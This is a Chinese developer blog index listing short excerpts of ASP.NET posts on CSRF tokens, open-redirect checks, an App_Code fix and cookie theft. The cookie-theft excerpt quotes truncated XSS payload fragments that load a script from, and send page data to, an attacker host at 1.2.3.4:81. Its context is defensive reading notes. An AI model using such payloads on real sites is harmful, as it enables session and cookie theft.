- 博客(4)
- 资源 (14)
- 收藏
- 关注
原创 Visual Studio 下开发无法引用App_Code 里的类
在Visual Studio里开发时,在App_Code文件夹啊里建立的类,无法在项目其他文件夹里引用到 这里有一个解决方法,就是设置App_Code里的类文件的属性设置App_Code里的类文件属性“生成操作”为“编译”,问题解决。
2013-11-17 10:52:07 2858
原创 读书笔记——威胁:跨站请求伪造
跨站请求伪造(Cross-Site Request Forgery,CSRF,但也用缩写XSRF表示),CSRF比简单的跨站脚本攻击更具危险性。阻止CSRF攻击1)、令牌验证可采用ASP.NET MVC 框架自带的方法:@Html.AntiForgeryToken()...Html.AntiForgeryToken辅助方法会输出一个加密值作为隐藏的输入元素:
2013-11-07 18:25:20 1359
原创 读书笔记——威胁:cookie盗窃
一般网站涉及cookie有两种形式:1、会话cookie2、持久性cookie 攻击者的方式可以有以下:a、输入文本“http://1.2.3.4:81/xss.js">"/>">http://www.a.com/a.jpg””b、window.location="http://1.2.3.4:81/r.php?u="+document.links[1].tex
2013-11-07 17:37:26 1200
原创 ASP.NET MVC 检测开放重定向攻击方法
IsLocalUrl方法是ASP.NET MVC 3.0新加的登录路径验证方法 //System.Web.WebPages RequestExtensions class private bool IsLocalUrl(string url) { if (string.IsNullOrWhiteSpace(url))
2013-11-07 17:03:13 1327
AntiXSS Library v4.2
2013-11-07
jQuery 1.4基础教程
2011-03-03
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人